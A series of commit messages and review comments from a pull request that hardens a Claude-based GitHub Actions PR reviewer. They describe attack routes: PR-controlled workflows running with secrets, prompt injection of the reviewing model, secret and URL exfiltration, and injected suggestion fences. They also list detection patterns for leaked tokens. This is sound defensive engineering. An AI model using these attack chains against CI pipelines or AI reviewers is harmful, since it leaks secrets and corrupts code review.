…ot] ref Two follow-up review items addressed. 1. Major -- diff.patch was racy with mid-run force-pushes. The previous commit pinned actions/checkout to github.event.pull_request.head.sha so files and headRefOid both reference the labeler-approved SHA. But the pre-fetch step still ran `gh pr diff "$PR_NUMBER"`, which queries the GitHub API for the *current* PR head -- if the author force-pushes between checkout and pre-fetch, Claude reviews SHA1's files (what's in the working tree) but is handed SHA2's diff. Inline findings would be anchored to the wrong SHA, and line numbers in the diff would not match the source files Claude is reading. Fix generates the diff locally from what we actually checked out: base_ref=$(jq -r .baseRefName /tmp/pr/meta.json) git fetch --no-tags origin "$base_ref" git diff "origin/${base_ref}...HEAD" > /tmp/pr/diff.patch Three-dot syntax mirrors GitHub's "Files changed" view ("what HEAD has that the merge-base with base does not"). HEAD is locked to the SHA- pinned checkout, so the diff is provably the diff of the SHA we reviewed regardless of any in-flight force-push. Two supporting changes were needed for merge-base to be reliably computable: (a) actions/checkout: add `fetch-depth: 0` so HEAD's full ancestry comes down. The default fetch-depth: 1 would leave us with a shallow clone where the three-dot diff cannot resolve merge-base. Cost is one full clone per review (vs. shallow); acceptable for a per-PR workflow. (b) Overlay step: drop `--depth=1` from `git fetch origin "${DEFAULT_BRANCH}"`. With fetch-depth: 0 on checkout the clone is uniformly non-shallow; adding a `--depth=1` ref here would re-introduce a shallow boundary on origin/<default> via .git/shallow, which then breaks the pre- fetch step's three-dot diff when base == default. Full-depth fetch keeps the clone uniformly non-shallow. 2. Minor -- stale claude[bot] reference in review-rocmlir-pr SKILL.md. Lines 240-242 referred to `prev_comments.json` "containing prior `claude[bot]` root comments" as the trigger for `update-pr-review`. The earlier commit (c1cf825) switched the workflow + the update-pr- review skill to filter on `github-actions[bot]` AND a hidden `` body marker, but missed this cross-reference. Updated to match, including a note that this pipeline never authors comments as `claude[bot]` (no Anthropic OIDC exchange) so the marker filter is the canonical detection. Verified `rg 'claude\[bot\]'` shows only intentional "do NOT match" guards remain. Verified locally: - python3 yaml.safe_load on the workflow + assertion of new invariants: checkout has fetch-depth: 0, overlay has no `--depth` flag in actual commands (only inside comment text), pre-fetch no longer invokes `gh pr diff` and does invoke `git diff "origin/<base>...HEAD"`. - bash -n on all three scripts. - End-to-end smoke of the new diff command on this very repo: from HEAD = a91b72b on wf/claude-pr-review: git fetch --no-tags origin develop git diff "origin/develop...HEAD" --stat produces exactly the 7 files this branch touched, with merge-base == origin/develop (b9d0687), confirming three-dot semantics work correctly on a SHA-pinned checkout after a fresh base fetch. Co-authored-by: Cursor <cursoragent@cursor.com>

Copilot

Pull request overview

Copilot reviewed 6 out of 7 changed files in this pull request and generated 8 comments.

…t-suggestion button Adds an optional `suggestion` field to inline_comments. When Claude is confident in a verbatim single-line replacement, the post script wraps it in a fenced ```suggestion block at the bottom of the comment body. GitHub renders this as a "Commit suggestion" button so reviewers can apply Claude's fix with one click. v1 is single-line replacements only -- no `start_line`/`start_side` multi-line range support. Rationale: the vast majority of LLVM/MLIR style fixes worth suggesting are single-line (use SmallVector here, use llvm::sort here, ++i instead of i++, missing auto&, C-style cast -> static_cast, etc.). Multi-line ranges add a conditional gh-args branch and a second consistency check in the sanitizer for marginal value; they can be added later if the use case appears. Schema (--json-schema in claude_auto_review.yml): inline_comments[].suggestion?: { type: string, minLength: 1 } The action rejects empty or wrong-type values upstream; sanitizer covers size + secret-pattern. Skill contract (review-rocmlir-pr/SKILL.md): 1. Single line only. Replaces exactly the line at `line` on `side`. 2. Verbatim, with correct indentation -- GitHub commits the bytes into the file as-is. 3. Self-contained -- must fully address the finding without edits elsewhere (no "and also add this #include" suggestions). 4. High confidence only -- a wrong suggestion is worse than no suggestion because the dev might click-commit it and ship a bug. Skill enumerates good cases (std::vector -> SmallVector, std::sort -> llvm::sort, i++ -> ++i, missing static, C-style cast -> static_cast, missing auto&) and skip cases (needs new #include, multi-line, ambiguous). update-pr-review/SKILL.md says "pass suggestion through unchanged from fresh findings; reconciliation skill never adds or modifies it" -- keeps the contract for when a suggestion is appropriate concentrated in one place (the review skill). Post script (post_claude_review.sh): body = jq -r .body suggestion = jq -r .suggestion // empty if suggestion non-empty: body += "\n\n```suggestion\n" + suggestion + "\n```" body = with_marker(body) The fenced block sits BEFORE the marker so re-review detection still finds the marker as the body's last token. Sanitizer (sanitize_claude_actions.sh): - Per-body 8 KiB cap now also covers inline_comments[].suggestion (the suggestion is concatenated into the body before posting, so an oversized suggestion would bloat the resulting PR comment past what GitHub will accept). - Secret-pattern scan and env-var-name scan already walk every string via `[.. | strings]`, so they cover suggestions automatically with no code change. Verified: - python3 yaml.safe_load + json.loads of the embedded --json-schema: suggestion present in inline_comments item properties as {type:string, minLength:1}, NOT in required. - bash -n clean on all three scripts. - Sanitizer fixtures (6/6 pass): * with_suggestion.json (good) -> exit 0 * no_suggestion.json (back-compat) -> exit 0 * leak_in_suggestion.json (ghs_* token) -> exit 2 * envname_in_suggestion.json (LLM_GATEWAY_KEY) -> exit 2 * oversize_suggestion.json (9 KiB > 8 KiB cap) -> exit 3 * empty_suggestion.json (sanitizer accepts; the action's --json-schema minLength:1 catches upstream) -> exit 0 - Body construction smoke test: body + blank line + fenced suggestion + blank line + marker, marker remains the last token (re-review detection unaffected). Co-authored-by: Cursor <cursoragent@cursor.com>

The previous commit added inline code suggestions but only documented the single-line contract in the skill prose -- nothing rejected a suggestion containing a newline or a triple-backtick. That allowed two failure modes: - LF/CR in suggestion: post_claude_review.sh wraps it as ```suggestion line1 line2 ``` GitHub renders this as a multi-line "Commit suggestion", but our API call only passes `line` / `side` (no start_line / start_side), so the REST endpoint replaces only the SINGLE line at `line` with all of the multi-line content. Almost certainly not what the developer wants when they click "Commit suggestion" -- a quiet correctness bug, not a workflow failure. - Triple-backtick in suggestion: closes the wrapping ```suggestion fence early and the remainder of the suggestion renders as ordinary comment text (or worse, opens a new fence with an arbitrary language tag from whatever follows). Either way the rendered comment doesn't match what Claude intended to suggest. Two-layer fix: 1. JSON Schema (--json-schema in claude_auto_review.yml): "suggestion": { "type": "string", "minLength": 1, "pattern": "^[^\\r\\n]*$" } The action validates the model's response upstream, so a multi-line suggestion fails fast with a schema validation error rather than reaching our sanitizer. Triple-backtick is intentionally NOT in the pattern -- a "no triple-backtick" rule needs lookaround, which JSON Schema validators support inconsistently. The sanitizer covers it. 2. Sanitizer (sanitize_claude_actions.sh): bad_suggestion=$(jq -r ' [.inline_comments[]?.suggestion // empty] | map(select(test("[\r\n]") or contains("```"))) | length ' "$ACTIONS_FILE") if (( bad_suggestion > 0 )); then exit 1; fi This is the bulletproof gate -- runs in our trusted code path before the artifact is uploaded, catches both LF/CR (overlap with the schema for defense-in-depth) and triple-backtick (the case the schema can't easily express). Skill (review-rocmlir-pr/SKILL.md): Updated the "single line only" rule to explicitly call out that the schema's `pattern` AND the workflow's sanitizer both reject any suggestion containing LF/CR or triple-backtick. A violating payload fails the workflow (visible error) rather than producing a broken comment (silent corruption). This makes the contract concrete for the model to reason about, and tells future maintainers where the enforcement lives. Verified: - python3 yaml.safe_load + json.loads of the embedded --json-schema; the pattern parses correctly to ^[^\r\n]*$ and re.compile()ing it against Python strings: " SmallVector<int64_t, 4> indices;" -> matches (good) "a\nb" -> rejects "a\rb" -> rejects "a```b" -> matches (sanitizer catches this) - bash -n on all three remaining scripts. - Sanitizer fixtures (7/7 pass): * good_single_line.json -> exit 0 * multiline_lf.json (real "\n" in string) -> exit 1 (single-line) * multiline_cr.json (real "\r" in string) -> exit 1 (single-line) * backtick.json (literal "```" in string) -> exit 1 (single-line) * no_suggestion.json (back-compat) -> exit 0 * leak_in_suggestion.json (ghs_* token) -> exit 2 (secret) * oversize.json (9 KiB > 8 KiB cap) -> exit 3 (size) Net diff: +34 / -2 across 3 files. Co-authored-by: Cursor <cursoragent@cursor.com>

Review feedback (Nit-3) flagged a small documentation drift in sanitize_claude_actions.sh: the cap comment said "an oversized suggestion would bloat the resulting PR comment", which implied we cap to prevent the combined posted body from being oversized. We don't -- we cap each of .summary / inline_comments[].body / inline_comments[].suggestion / thread_updates[].body INDIVIDUALLY at MAX_BODY_BYTES (8 KiB). Worst-case posted body is body + framing + suggestion + marker = ~2x the per-string cap (~16 KiB at 8 KiB), which is well inside GitHub's ~65 KiB PR-comment limit, so the per-string cap dominates in practice. This commit only updates the comment + reword the error message ("body field(s)" -> "string field(s)") to match what's actually checked. Behavior is unchanged. Reviewer Nit-1 (suggestion newlines not enforced) and Nit-2 (closing- fence backticks inside suggestion) are NOT addressed here because they were already addressed in the prior commit d037993, which both added a JSON Schema pattern (^[^\r\n]*$) on the action's side and a sanitizer check that rejects suggestion strings matching test("[\r\n]") or contains("```"). Reviewer was looking at a snapshot from before that commit. No action needed. Verified: - bash -n on sanitize_claude_actions.sh. - Fixture battery (4/4 unchanged outcomes): oversize.json (>8 KiB suggestion) -> exit 3 (with the reworded "string field(s)" message) lf.json (suggestion contains "\n") -> exit 1 (single-line) bt.json (suggestion contains literal "```") -> exit 1 (single-line) good.json (single-line suggestion) -> exit 0 Co-authored-by: Cursor <cursoragent@cursor.com>

pull_request_target's "checkout PR HEAD with secrets in env" pattern is the root cause of a long string of LLM-on-PR CVEs. We don't actually need its headline feature (giving fork PRs access to repo secrets) because the workflow's contract is "internal contributors only". Changes: - on: pull_request_target -> on: pull_request (still types: [labeled]) - Both gating jobs (review, cleanup) add an explicit same-repo check (head.repo.full_name == repository) so fork PRs are a clean no-op instead of "ran but failed at the API-key step". workflow_dispatch remains a fork-PR escape hatch for maintainer-driven reviews. - Header rewritten to document the new design and the trade-offs we accept (workflow file now read from PR HEAD, overlay step demoted from hard boundary to defense-in-depth) and to enumerate the hardening that carries over unchanged (SHA-pinned checkout, persist-credentials: false, two-job split, sanitizer/schema/caps, concurrency). - Overlay step's threat-model comment updated to be honest about its weaker guarantee under pull_request. Co-authored-by: Cursor <cursoragent@cursor.com>

The new pull_request trigger in claude_auto_review.yml causes the review/post/cleanup jobs to skip silently for fork PRs (the same-repo gate rules them out). That's correct security behavior, but the maintainer who applied the label is left wondering why nothing happened. Add claude_auto_review_fork_notify.yml as a companion that fires on the same labeled event via pull_request_target and posts a single explanatory comment + removes the label. pull_request_target is safe in this file specifically because there is NO actions/checkout step, no PR-author-controlled string is interpolated into the shell or the comment body, and the only commands run are gh pr comment (with a hardcoded body) and gh api -X DELETE (against a hardcoded label name). Hardening: - Workflow-level permissions: {} (default-deny); job-level pull-requests: write only. - concurrency cancel-in-progress on PR number, so rapid label toggles collapse to (in the common case) a single notice for the settled label state. - Comment-then-removal ordering with explicit exit-code capture: the label is removed even when the comment fails, so the maintainer can always retry by re-labeling. Verified against both happy-path and gh-pr-comment-failure scenarios with a mock-gh harness. Also updates the main workflow's header and review-job if: comment to reference the companion file, so a future bisector or reader sees both pieces of the integration committed atomically. Co-authored-by: Cursor <cursoragent@cursor.com>

Three changes from PR review, plus a CODEOWNERS update. All three review comments were valid; the Critical one in particular pointed out that my earlier header comment had the threat model wrong. Major 1 -- Pin post-job checkout to default branch Under pull_request, actions/checkout defaults to refs/pull/N/merge when no ref is given. That means the post job was loading .github/scripts/post_claude_review.sh from the PR's merge ref, then running it with pull-requests: write -- a PR-controlled script could post arbitrary comments / set arbitrary labels. Pin explicitly to github.event.repository.default_branch so the post script's provenance is always the trusted, code-owner-approved version. Major 2 -- Cleanup label removal: permissions + selective error handling Per GitHub REST docs, the /repos/.../issues/N/labels/{name} endpoint is on the issues path because "PRs are issues" in GitHub's data model -- it requires `issues: write`, NOT `pull-requests: write`. Without that permission the DELETE silently 403'd and `|| true` swallowed the failure, leaving the label stuck and blocking re-trigger. Add `issues: write` to both the cleanup job and the fork-notify workflow's job, and replace `|| true` with selective 404 handling: 404 (label already absent) is the expected no-op, any other failure surfaces as a job failure (cleanup) or workflow warning (fork-notify, where comment success is the primary signal). Verified end-to-end against {ok, 404, auth_fail} x {comment_ok, comment_fail} scenarios with a mock-gh harness. Critical -- Restate the threat model honestly + add Layer-3 guard My earlier header claimed "PR authors with write access already have push access to develop, so modifying the workflow file in a PR is not a new privilege." This was wrong on two counts: * Branch protection on develop typically blocks direct push even for write-access users; pushing to a feature branch is a strictly weaker bar. * The label-apply trigger requires `triage`, which is strictly weaker than `write`. So the attack chain only needs the workflow modifier and the label applier to be different lower-privilege users, neither of whom alone could leak secrets under the prior pull_request_target design. Switching to pull_request opened a CVE class -- "PR-controlled workflow file with secrets in env" -- that is fundamentally not mitigatable from inside the workflow. Decision: keep pull_request, mitigate externally + procedurally. This commit lands the in-workflow + documentation pieces: 1. Rewritten SECURITY MODEL header that: - Drops the incorrect claim about develop push access. - Documents the residual risk explicitly. - Lays out the three mandatory mitigation layers (repo configuration, maintainer procedure, in-workflow defense-in-depth) and which threats each layer actually covers (and which it doesn't). 2. New "Layer 3" review-job step that hard-fails the run if the PR's diff against base touches .github/workflows/, .github/scripts/, or .claude/. Defense-in-depth -- catches accidental modifications by legitimate contributors and raises the bar for unsophisticated attackers; cannot defeat a sophisticated attacker (who can simply remove the step from their PR-controlled workflow), so the layered story still hinges on the maintainer procedure. Skipped on workflow_dispatch (which uses the trusted develop workflow). Verified against clean / perimeter-only / mixed PR diffs. 3. CODEOWNERS: added explicit entries for .github/workflows/, .github/scripts/, and .claude/. Functionally redundant with the existing wildcard but makes the security perimeter inspectable and provides the obvious place to add additional reviewers (e.g. a security team) later. Required out-of-band work documented in the workflow header (must be done by a repo admin): - Branch protection on develop must require code-owner review and prohibit direct pushes (even for admins). - Settings -> Actions -> General -> "Require approval for all outside collaborators". Co-authored-by: Cursor <cursoragent@cursor.com>

Companion workflow to make Layer 2 of the security model (maintainer procedure: audit perimeter modifications before applying claude-review) materially more robust by surfacing perimeter modifications visually in the PR's labelset and as a top-level banner comment, instead of relying on the maintainer to spot them in the file diff. claude_auto_review_perimeter_banner.yml: - Trigger: pull_request_target on opened / synchronize / reopened. Runs on every PR push, including from forks (we need fork PRs to get the banner too). - For each event, queries the GitHub API for the changed-file list (no checkout, no PR code execution -- safe pull_request_target pattern, same as claude_auto_review_fork_notify.yml). Filters to the perimeter regex (.github/workflows/, .github/scripts/, .claude/). - If the perimeter is touched: * `gh label create --force` ensures the modifies-ci-paths label exists (upsert; idempotent). * `gh pr edit --add-label modifies-ci-paths` (idempotent). * Checks for an existing banner via a hidden HTML marker (); posts the banner only if not already present. Marker version can be bumped to force a re-post if the banner template changes. - If the perimeter is NOT touched: removes the modifies-ci-paths label if present (so the labelset stays accurate after a fix-up push). The historical banner comment is left in place. - Permissions: pull-requests: write + issues: write only. Workflow- level permissions: {} (default-deny); concurrency cancel-in-progress keyed on PR number. - Heredoc-rendered banner body: hardcoded text plus the perimeter- changed file paths interpolated via printf (output treated as literal text by the heredoc, never re-evaluated as shell). Visual body verified against a realistic perimeter+legitimate file mix. Behavioral verification (mock-gh harness, four scenarios): A. Clean PR; stale label present -> remove label, log it B. Clean PR; no stale label -> attempt remove (no-op), log "nothing to do" C. Perimeter touched; no prior banner -> label_create + add_label + list_comments + post D. Perimeter touched; banner present -> label_create + add_label + list_comments (find existing) + skip post All four pass; op order and stdout messages match expectations. Companion to: - claude_auto_review.yml (main; runs claude-code-action on label / dispatch). Header updated to reference this companion in the Layer 2 documentation. - claude_auto_review_fork_notify.yml (notifies fork PRs that the label flow doesn't apply to them). Notes: - PERIMETER_REGEX duplicated between this file and the Layer-3 perimeter-block step in claude_auto_review.yml. Comment in both places notes they must stay in sync. - The marker version (v1) lets us force a banner re-post on existing PRs by bumping it if we ever rewrite the banner text. Co-authored-by: Cursor <cursoragent@cursor.com>

Nit-1: drop pull-requests:write from cleanup job The job's only step is a label DELETE on the /issues/.../labels/{name} endpoint, which requires issues:write (PRs are issues in GitHub's data model -- "shared" actions like labels live on the issues endpoints per the REST docs). pull-requests:write was being carried speculatively for "future cleanup steps"; least-privilege says don't. If a future step needs it, adding the line back with a clear motivation is trivial. Nit-2: Layer-3 perimeter check now diffs against default branch, not PR base Renamed env var BASE_REF -> DEFAULT_BRANCH and switched the diff baseline from `github.event.pull_request.base.ref` to `github.event.repository.default_branch`. Rationale: the whole point of the Layer-3 guard is "the workflow about to run with secrets differs from the trusted dispatch-time version". Dispatch runs from the default branch regardless of what the PR's base is, so the diff baseline must also be the default branch. In the common case (PR targets develop) this is identical to the old behavior. The behavior change only matters for PRs targeting release branches whose perimeter has diverged from develop -- previously such PRs could slip past Layer 3 even though the workflow about to run differed from the trusted baseline; they now correctly fire and force the maintainer through workflow_dispatch. Verified: - YAML parse + permissions check (cleanup has only issues:write). - Layer-3 env now contains only DEFAULT_BRANCH (no BASE_REF). - Behavioral re-test, four scenarios in throwaway git repos: 1. PR targets develop, clean -> pass 2. PR targets develop, perimeter -> blocked 3. PR targets release/v2 with -> blocked (NEW: this case release-side perimeter previously slipped past divergence, PR itself clean the guard) 4. PR targets release/v2, no -> pass perimeter divergence Co-authored-by: Cursor <cursoragent@cursor.com>

Two Major fixes from PR review. Major 1 -- Snapshot PR-side perimeter files for dispatch reviews The review job overlays .claude/ and .github/scripts/ from the default branch before claude-code-action runs. That overlay is correct (and necessary) for runtime safety: the Skill tool reads from the workspace .claude/skills/, the sanitizer is invoked from .github/scripts/, and neither should ever execute the PR's proposed version of those files. But the workflow header recommends workflow_dispatch as the escape hatch precisely for PRs that legitimately modify those paths -- and under the prior implementation the dispatch path's review was incomplete: Read on .claude/skills/foo.md after the overlay returned the trusted develop version, not the PR's proposed version. diff.patch showed the changes but Claude couldn't read the post-change file content for context, silently producing an inaccurate review. Fix: snapshot-before-overlay. A new step copies workspace .claude/ and .github/scripts/ to /tmp/pr-source/ BEFORE the overlay restores the trusted versions. The review-rocmlir-pr SKILL is documented to consult /tmp/pr-source/<path> when diff.patch shows changes under the overlay-targeted paths. Workspace runtime path is unchanged (still trusted overlay version); review-side Read path now has fidelity to the PR. Step ordering: Layer-3 -> Snapshot -> Overlay. Under pull_request the snapshot only ever captures unchanged perimeter files (Layer-3 already failed any perimeter PR by then), so the snapshot has zero overhead and zero security impact for the label-trigger path. Under workflow_dispatch (Layer-3 skipped) the snapshot is the mechanism that makes the dispatch escape hatch actually work for perimeter PRs. Verified against four scenarios in throwaway workspaces: A. workspace has no perimeter paths -> empty snapshot B. workspace has .claude/ only -> only .claude/ captured C. workspace has .claude/ AND scripts/ -> both captured D. content fidelity (exact PR-side bytes) -> byte-for-byte match Also updated: - SKILL.md (review-rocmlir-pr): new "Special case: changes under .claude/ or .github/scripts/" subsection in Step 1, with a path table mapping workspace paths to /tmp/pr-source paths. - workflow header (Layer 2 dispatch advice): now describes the snapshot mechanism explicitly so a reader doesn't have to guess why dispatch on a perimeter PR works. Major 2 -- Fork-notify: honest label-state comment + loud failure The previous fork-notify shell ran: 1. post comment claiming "label has been removed" 2. attempt label DELETE 3. on non-404 DELETE failure, emit ::warning::, exit 0 This combined the worst possible outcome of "delete failed AND comment lied AND job green" into a likely silent failure mode. Restructure to delete-first / compose-then-post / fail-loud: 1. Try to DELETE the label, classify result as one of: removed -- API returned success absent -- API returned 404 (was already gone; same user guarantee as removed) failed -- any other failure (auth, rate limit, network) 2. Compose the label-status sentence in the comment body to reflect the actual state. The "failed" branch tells the maintainer to remove the label manually before retrying and points at the workflow run logs for the underlying error. 3. Post the comment. 4. Exit non-zero if EITHER the delete failed OR the comment failed, emitting ::error:: annotations for whichever step(s) failed so the run summary surfaces the actionable items. Verified against all 6 (delete_state x comment_state) combinations with a mock-gh harness: removed + ok -> exit 0, "has been removed" in body absent + ok -> exit 0, "is not currently applied" in body failed + ok -> exit 1, "Automatic removal FAILED" in body, ::error::Failed to remove removed + comment_fail -> exit 1, ::error::Failed to post absent + comment_fail -> exit 1, ::error::Failed to post failed + comment_fail -> exit 1, both ::error:: annotations The "comment lies + label stuck + run green" failure mode is mechanically eliminated. Co-authored-by: Cursor <cursoragent@cursor.com>

Major: the duplicate-banner check filtered comments by marker text only. A PR commenter could include `` in a regular comment to silently suppress the warning banner on subsequent perimeter-touching pushes. Now require both author == github-actions[bot] AND body contains marker; user.login is server-determined from the comment's auth token, so a PR author cannot impersonate the bot. Minor: PR-controlled filenames were rendered inside a markdown fence, so a path containing a backtick or triple-backtick could break the fence and inject attacker-controlled markdown into a github-actions[bot] comment. Now rendered as a markdown bullet list with each filename in inline-code, backticks stripped from filename interiors, and capped at 50 entries with an overflow indicator to prevent unbounded comment size. Co-authored-by: Cursor <cursoragent@cursor.com>

…IGPIPE Major (sanitizer): the structured inline_comments[].suggestion field had single-line / no-fence enforcement, but the prose body fields did not. A model emitting a raw ```suggestion fence inside .summary, .inline_comments[].body, or .thread_updates[].body would render in GitHub as a one-click "Commit suggestion" UI carrying attacker-controlled bytes, bypassing every part of the structured-suggestion contract. Add a sanitizer check that splits each body field on newlines and rejects any line matching `^[ \t]*` + `\`{3,}` + `[ \t]*suggestion[ \t]*$` -- catches 3+ backtick fences with optional surrounding whitespace, the forms GitHub renders. Update review-rocmlir-pr SKILL.md so the model knows to keep suggestion fences out of prose fields and use a different language tag (e.g. ```cpp) when only displaying code. Major (banner): `printf "$perimeter" | head -n 50 | sed ...` ran under `set -euo pipefail`. With a pathological (large) perimeter list, head closes the pipe after 50 lines, printf gets SIGPIPE on its next write and exits 141, pipefail fails the pipeline, and the step exits before the banner is posted -- silently dropping the warning. Replaced with a single awk pass (`length($0) > 0 { n++; if (n <= 50) ... }`) that reads stdin to EOF and never closes early, so the pipeline succeeds under pipefail regardless of input size. Empirically: old pipeline exits 141 on a 5000-line input; new pipeline exits 0, renders 50 lines + the overflow note. Added a NOTE comment explaining the failure mode so future contributors don't reintroduce a head -n N here. Co-authored-by: Cursor <cursoragent@cursor.com>

…eta) Valid fixes: - update-pr-review SKILL.md: track Claude's own marker-tagged replies (`claude_replies`, `latest_reply_is_claude`) and gate the resolve/ clarify emit on "is the latest reply on the thread already ours?". Without the gate, every re-review re-emitted resolve/clarify on still-fixed/still-clarified threads, posting duplicate replies on every rerun. - post_claude_review.sh: narrow the 422-as-warning suppression to ONLY the "line not part of the diff" case (HTTP 422 AND error body matches "part of the diff" / variants). Other 422s (invalid commit_id, abuse rate-limit, schema errors) and all other non-2xx now set HAD_FAILURE so the job fails visibly rather than silently dropping real findings. - sanitize_claude_actions.sh: * `length` -> `utf8bytelength` for the per-string byte cap. jq's `length` counts code points; we want bytes-on-the-wire after UTF-8 encoding so multi-byte content (CJK, emoji, accented Latin in code quotes) cannot pass an N-codepoint check while exceeding N bytes downstream. * Redact the env-var-name preview the same way the credential-pattern preview is redacted. The matched line could include the env var's value (e.g. `ANTHROPIC_BASE_URL=https://...`) and printing it verbatim into the GHA log would defeat the secret protection. * New scan for the LITERAL `ANTHROPIC_BASE_URL` value (passed via env from the workflow). The env-var-NAME scan misses an exfil that leaks the URL by VALUE alone without ever mentioning the variable name. Match is reported with full redaction so the URL never lands in the log. - claude_auto_review.yml: * `--json-schema`: drop `LEFT` from the inline_comments[].side enum. GitHub's review-comment API uses base-file line numbers for LEFT but the skill (and the diff context loaded into the prompt) is head-relative only -- a LEFT comment would either anchor wrong or 422. * Sanitize step now exports `ANTHROPIC_BASE_URL` so the new URL- value scan can see it. - review-rocmlir-pr SKILL.md: * Forbid `side: "LEFT"` in inline_comments; document why and tell Claude to use the nearest surviving RIGHT-side context line instead. * Fix the `llvm::sort` rationale: the LLVM coding standard exists because `llvm::sort` shuffles inputs under EXPENSIVE_CHECKS to surface order-dependent bugs, NOT because it makes equal elements deterministic (it doesn't -- `llvm::stable_sort` is the stable one). Old wording would have led the bot to file misleading "stability" findings. Triaged (no code change; per-comment replies posted on the PR): - meta.json mutability: invalid premise. Claude's --allowedTools is `Skill,Read,Grep,Glob` -- there is no Write tool, so the model cannot mutate /tmp/pr/meta.json from prompt injection. - execlog sanitizer false-positives: invalid. The file sanitize_claude_execlog.sh was removed in commit 778ec92 ("Simplify Claude review pipeline (Path A + structured outputs + drop execlog + concurrency)"); the comment was reviewing an obsolete state. - "doc says Read/Grep/Glob but code allows Write": invalid. Code matches doc -- `--allowedTools "Skill,Read,Grep,Glob"` (no Write). - PR description vs implementation mismatch: meta, belongs in the PR description, not in code. - post job checkout pin: already fixed in 9102ef3 -- post job pins `ref: ${{ github.event.repository.default_branch }}` with sparse-checkout and persist-credentials: false. Co-authored-by: Cursor <cursoragent@cursor.com>

Copilot

Pull request overview

Copilot reviewed 9 out of 10 changed files in this pull request and generated 6 comments.

Comments suppressed due to low confidence (1)

.claude/skills/update-pr-review/SKILL.md:136

The dedup gate treats any latest marker-tagged Claude reply as if it were an earlier resolve reply, but the latest Claude reply may be a prior clarify. In that common flow (developer replied, Claude clarified while the issue still existed, then the developer fixes the code without adding another reply), the fresh finding disappears and this branch skips instead of emitting the first resolve/resolve_with_reaction. Track the reply type/content separately so only an existing resolved reply suppresses resolution.

    **Dedup gate** (applies to both A and B): if `prev_comment.claude_replies` is
    non-empty AND `prev_comment.latest_reply_is_claude` is `true`, we already posted a
    resolve reply on a previous run and no new human activity has occurred since.
    **Skip silently** to avoid posting a duplicate "Resolved" reply on every rerun.

Replaces every secrets.GITHUB_TOKEN-driven gh/git API call with a short-lived (1h) installation token minted in-job via actions/create-github-app-token@bcd2ba4 (v3.2.0, SHA-pinned) using ROCMLIR_PR_REVIEWER_APP_ID + ROCMLIR_PR_REVIEWER_PRIVATE_KEY. Bot identity: - All comments / replies / reactions now post under rocmlir-pr-reviewer[bot] (was: github-actions[bot]). - Centralized in workflow-level `env: BOT_LOGIN` in claude_auto_review.yml; mirrored in: * claude-code-action's `allowed_bots` input (uses ${{ env.BOT_LOGIN }}) * the prompt's bot-identity rules * perimeter-banner's `EXPECTED_AUTHOR` * the literal in update-pr-review/SKILL.md and review-rocmlir-pr/SKILL.md If the App's slug ever changes (`gh api /apps/<slug>`), update those five locations. Default-token permissions minimized: - review job: contents:read only (was: + pull-requests:read + checks:read) - post job: contents:read only (was: + pull-requests:write) - cleanup: permissions: {} (was: issues:write) - perimeter-banner detect: permissions: {} (was: pull-requests:write + issues:write) - fork-notify notify-fork-pr: permissions: {} (was: pull-requests:write + issues:write) A prompt-injected Claude can no longer escalate via the default token -- the default token has no write capability anywhere; the App token is what authenticates writes, is minted per-job, and is never propagated into claude-code-action's environment. Marker rationale rewritten: The hidden HTML marker is kept (post_claude_review.sh, both skills, the prompt) but its purpose changed from "filter out other workflows sharing the github-actions[bot] identity" to "distinguish OUR own resolve/clarify replies from human replies on the same thread, so the update-pr-review skill's dedup gate works correctly". With a unique App identity, author-only filtering would technically suffice, but the marker remains for that internal-thread-state purpose plus migration hygiene. Documentation: - SECURITY MODEL block in claude_auto_review.yml updated to describe the App token model. - fork-notify file-header revised (no longer references GITHUB_TOKEN-downgrade behavior). - update-pr-review SKILL.md and review-rocmlir-pr SKILL.md updated to filter on rocmlir-pr-reviewer[bot] and explicitly tell the model NOT to match on the legacy github-actions[bot] identity. - post_claude_review.sh's required-env docstring documents the App token. Verification: - bash -n + yaml.safe_load on all touched files: clean. - Structural assertions: every GH_TOKEN sourced from steps.app-token.outputs.token, every Generate-App-token step SHA-pinned and ordered before its first GH_TOKEN consumer, no leftover secrets.GITHUB_TOKEN, every author-filter location uses the new identity, every default-token permission block is contents:read or {}. - Existing sanitizer + 422 fixture suites: pass (no regression -- no logic changes outside identity / token plumbing). Required repo configuration before this can run end-to-end: - App `rocMLIR-PR-Reviewer` installed on ROCm/rocMLIR with pull-requests:write + issues:write + metadata:read installation permissions. - Repository secrets ROCMLIR_PR_REVIEWER_APP_ID + ROCMLIR_PR_REVIEWER_PRIVATE_KEY configured. Co-authored-by: Cursor <cursoragent@cursor.com>

- workflow_dispatch ref gate: require github.ref == default_branch on the dispatch path. workflow_dispatch runs the YAML from the SELECTED ref, not from default; without this gate, dispatching a PR branch would run the PR-controlled workflow with full LLM Gateway secrets, defeating the perimeter check (which is intentionally disabled on dispatch). - Pre-fetch derives meta.files from the same pinned `git diff origin/<base>...HEAD` ref range that produces diff.patch, so the file list the review skill consumes never disagrees with the workspace + diff if a force-push lands during the run. - Prompt example schema: side is "RIGHT" (was "RIGHT|LEFT"), with an explicit RIGHT-only enforcement note so a model following the prompt cannot emit a value the json-schema validator rejects. - update-pr-review skill: distinguish resolve vs clarify in claude replies (kind = "resolve" iff body starts with the canned `Resolved -- addressed in this revision.` prefix). Refines the dedup gate per scenario and adds an explicit regression branch in Scenario D so a finding that returns after a previous Resolved reply now emits a clarify call-out instead of being silently swallowed. - review-rocmlir-pr skill: inputs table reflects the actual sources (local git diff for diff.patch; locally-derived files array in meta.json) instead of the historical gh pr diff / gh pr view --json files commands. - sanitize_claude_actions.sh: enforce a strict URL allow-list in actions output (github.com / *.github.com / *.githubusercontent.com only). Blocks phishing URLs, click-trackers, typosquats, and URL-shaped exfil that the existing fixed-string ANTHROPIC_BASE_URL check left open. Tighten the prompt's Hard constraints block to match. - perimeter-banner: stop swallowing label-removal failures. Mirror the cleanup job's gh api --method DELETE + selective HTTP 404 pattern so auth/rate/network failures fail the workflow loudly instead of leaving stale modifies-ci-paths state on the PR. Verified: yaml parses on all touched workflows; bash -n on every run: body and on the sanitizer; structural assertions for each fix; 11/11 URL allow-list sanitizer fixtures (github.com pass, anthropic.com / phishing / typosquat / port / inline body / clarify / uppercase scheme all rejected; github.com:443 still passes). Co-authored-by: Cursor <cursoragent@cursor.com>

